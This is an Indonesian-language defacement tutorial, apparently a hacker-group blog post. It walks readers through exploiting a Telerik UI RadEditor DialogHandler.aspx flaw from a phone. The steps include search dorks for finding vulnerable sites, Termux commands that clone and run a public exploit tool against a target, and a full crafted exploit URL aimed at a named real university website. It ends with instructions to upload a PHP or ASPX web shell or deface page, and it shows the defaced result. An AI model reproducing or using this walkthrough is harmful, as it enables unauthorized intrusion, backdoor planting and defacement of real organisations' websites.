Deface Telerik UI RCE - D-GOD


Hallo Para  Defacer Indonesia, Perkenalkan Nama gua D-GOD atau DytoXcirara disini gua mau memberikan kalian tutorial untuk melakukan deface menggunakan poc Telerick di android!!

Alat Dan Bahan:
-Hp (wajib)
-Aplikasi Termux (wajib)
-Script Deface (wajib)
-Shell Backdoor
-Internet (wajib)


Dork:
-DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx
-DesktopModules/Admin/RadEditorProvider/

Note:web yang VULN akan ada tulisan "loading the dialog" tapi walaupun ada tulisan itu tidak menjamin keseluruhanya akan VULN jadi bersabarlah kawan

Exploit:
-/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx
(tambahkan di belakang web)


Oke disini saya juga sudah punya live target yaitu:
-http://vns.hnue.edu.vn

1.Kita
gabungkan web dan Exploit nya seperti ini:

-http://vns.hnue.edu.vn/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx

Kalau ada tulisan "Loading the dialog" berarti VULN

2.
Kita buka Termux di hp kita oke dan masukan scriptnya di bawah ini:
$pkg install git -y
$pkg install pip
$git clone https://github.com/bao7uo/dp_crypto
$cd dp_crypto
$python3 dp_crypto.py k -u (masukkan website targetnya beserta Exploit nya)

Script From: Exploit-Db

Contoh seperti gambar dibawah ini:

Kalau sudah langsung saja di klik oke/yes/next di Termux nya.

Kalau sudah akan seperti gambar dibawah ini:
Note:Jika key position di Termux hanya berjalan sebelah kiri saja atau hanya satu berubah-ubah angka/hurufnya maka itu artinya tidak VULN,tapi kalau angka/huruf key position nya dua-duanya berubah maka itu VULN.

3.
Setelah menunggu beberapa saat dan jika website berhasil kita inject maka tampilannya akan seperti gambar dibawah ini:

Lalu kita copy dari http hingga akhir.
Contoh:

http://vns.hnue.edu.vn/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?DialogName=DocumentManager&renderMode=2&Skin=Default&Title=Document%20Manager&dpptn=&isRtl=false&dp=Y2IDLhtcSy5gGwgBVV18F1d1TDQdFBRKEFh1MSJ2ETB/PU9iVS0UVXh1Z15adhMAa2N0LiZ2Wzh9BRRNU2dnMnlxTCMmFAgMF3N9diMSNHV/AFwAZBR3UW4oTV5qZnRZa2JkLRhmYQFoGwhYYgNgdFZ1YjglBBNVJnZLBRgTPDloF0BNegUQQFMSYAVtXBNFa3JgPxZmCilrED5zbmdKO25hQzsIBwwOFG1xMSN2AihnA3EHVwsPSmENfwNiYjJHfXNGMhtLXxNkFH4NeAF8LW1qfiglBQdRJn1hLiIpcTl+AmVOUhQXSnoGTWZ1XDZHaARzfxJlRwRTLgBdVXdkB1Zlfi4eBBdVGHN9MCATcTl+AW1fVAsMVXsBeEFueQ8Ba2FCCBtpWxRSBD5CbmdgBlVlTC4RcSkPGGZLBRgTPDloF0BPegcLTnkBUkV1dTF9Uwd4LiB2X3RoGxREVQIHEG1qZi0IBh9RIH19Lg0ABTB9dG1HVAQUelQoDAFbAxNJYAcPMyZ2ZTdVBQRNVQNoMW51YjsSCylOGGAGKiMTETBgKXFEVXEXSnoGQgVuXClcVQR0LiZ2Wzh9BRRNU2dnMnlxTCMmFAgMF3N1NBEQMAlRdXlFVxR3bFV2Y1hZcj13aGJOPBhiRDh9BhxcVXh8LXsCYnYgBBNAIFh1MRMDKCtQAw5ZVXIAUVMCUkFqXANDUgdjNQ9yRHVlBABBbQNkKW4AYTEWLgNKIQdmMQwHPCJkPmUHYC8Yd2cRQWdiZj1cUlhaNA5aYTJoFD5CbQBgLW5fWDclGxdJIAcHNxMDKCtQAw5ZYAsuTm0QAFpaZhBDY1hwNSEDZjF8AD5jZQFoO2NeXAknBAMMDGNbIxd0KHJkKGFFUhUIYWIrd1lqSykFZXJCFSF3XxpUCxxVenUHc21fAREhFAxAJ31DDyB1DnFlEHlgUgUyYXkRd2duAR8BZmNSLSB2fTBkLQRuYQNac2NcWHEech9xFFt9IxYBNDRrHFwGYQUyYWQdY2VuZjFKYmBsJyB2fTdlLQRdelpjdGBlRAAhBnQMDH1fDyApCndmKlsEbHIHQ2Ere1lrdx8FZllnPiZnQxtnKQReVWVoO2B3egERFBdhEVt9Khd0cQ5lKF9EYBQLQFMCTVtZWwcEZWJGASBnXxpnFwhkZXVnOGBeUAklBnVAF2FydRATPDBQd1N5UhQ6CVYdd0FiZwtcU3JgLCZ2XzRTKj5zbmdKO25hQzgIBh9RIH19Lg==

4.
Setelah di copy kalian paste kan di google chrome dan jika berhasil maka akan ada tempat upload seperti gambar dibawah ini:

Lalu kalian klik/pencet tombol + warna hijau disana atau cari tulisan upload,lalu kalian upload Shell kalian atau script kalian

Note:kalau Shell bisa php dan aspx

Ini contoh punya saya:

http://vns.hnue.edu.vn/roz.html

Sekian dari saya mohon maaf bila ada kesalahan dan kekurangan terimakasih bagi yang telah membaca salam D-GOD

Best Regard:
INDONESIAN ERROR SYSTEM
loading...

Berlangganan via Email